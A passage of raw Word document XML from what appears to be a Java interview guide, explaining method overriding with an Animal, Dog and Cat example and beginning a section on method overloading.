        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc196307602"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to achieve method overriding?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="42BAA6C4" w14:textId="1E21CAA2" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">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o achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, you need to follow these key steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C8F96" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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herit the Parent Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The subclass must extend the parent class to inherit its methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D33ED" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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verride the Parent Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In the subclass, redefine the inherited method using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same method signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as in the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FDDB0C" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Override annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Although optional, it is a good practice to use the @Override annotation to ensure you're overriding a method correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B265E48" w14:textId="77777777" w:rsidR="00D86C8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D86C8F" w:rsidP="00565ED6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC92DEF" w14:textId="68157B41" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">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teps for Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3E3BF" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60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reate a Parent class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74D986" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60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reate a Subclass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that extends the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C9B9ED" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60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verride the method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEA78A" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60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the subclass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to call the overridden method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E4F4C" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00565ED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C513495">
          <v:rect id="_x0000_i1352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454DB52" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">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Achieving Method Overriding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EA1EC" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED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Parent Class (Superclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D469900"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78686CAA"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Method to be overridden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DA387"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61174FED"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Animal makes a sound");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566227CA"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E9D516B"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44931F7" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED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Child Class (Subclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E9E22"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D54A2F"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Overriding the makeSound method of Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B99A9"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79929ECA"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E2A6A5"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Dog barks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FB3C5"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D4096BC"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1E3820A" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30008802"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class Cat extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6E8E6B"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Overriding the makeSound method of Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A629B"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7985B5F0"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1AC1B"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at meows");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A543B48"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C733131"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A32FE31" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED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Testing Method Overriding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E6C08"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3893144C"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7D7E7396"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ing objects of subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77252DD6"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nimal myDog = new Dog();  // Parent reference, Child object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C5DC1"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nimal myCat = new Cat();  // Parent reference, Child object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85AE6C" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358141FF"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lling the overridden method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACDA888"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Dog.makeSound();  // Output: Dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC73B86"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Cat.makeSound();  // Output: Cat meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4386E1"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59A41AE"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9D65ED2" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00565ED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25B1EB5">
          <v:rect id="_x0000_i1353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00005105" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">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Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2730DF2C" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ame Method Signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The method in the subclass must have the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same name</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same return type</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same parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as in the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE50DD" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Override annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is a compiler-time check to ensure you're correctly overriding the method. If you don’t match the method signature, the compiler will give an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A0E031" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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heritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The subclass must inherit from the parent class. The method in the parent class should not be final, static, or private as those methods cannot be overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC56A39" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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untime Polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Method overriding is associated with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> determines which method to invoke (in the example, it’s determined at runtime whether the Dog or Cat method is invoked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F891646" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00565ED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CB5D2C7">
          <v:rect id="_x0000_i1354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29286827" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">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y Method Overriding is Useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E306927" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ustomization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overriding allows a subclass to customize the behavior of a method that it inherits from the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EAD7E" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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olymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It supports polymorphic behavior, allowing you to treat objects of different classes (that share a common superclass) in a similar manner while still calling their specific methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6992C10B" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED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example, in the above case, we can treat both Dog and Cat as Animal types but still call the overridden methods specific to each class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54FB63" w14:textId="1ACF6AEE" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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7E72F289">
          <v:rect id="_x0000_i1355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DEE5C" w14:textId="77777777" w:rsidR="00530FA9" w:rsidRPr="00CE4B95" w:rsidRDefault="00530FA9" w:rsidP="00530FA9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc196307603"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is method overloading?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="10D32E89" w14:textId="51818E81" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">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 Overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a concept in Java where a class has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (either in number or type). The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be the same or different, but the method signature must differ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD07A7"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verloading allows a class to define multiple methods that perform similar tasks but with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B48E4" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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1C5CE82">
          <v:rect id="_x0000_i1356" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F827A6" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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Points of Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15D675" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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ame method name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the same class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD12776" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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ifferent parameter lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in number, type, or both).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3B581" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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an have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different return types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
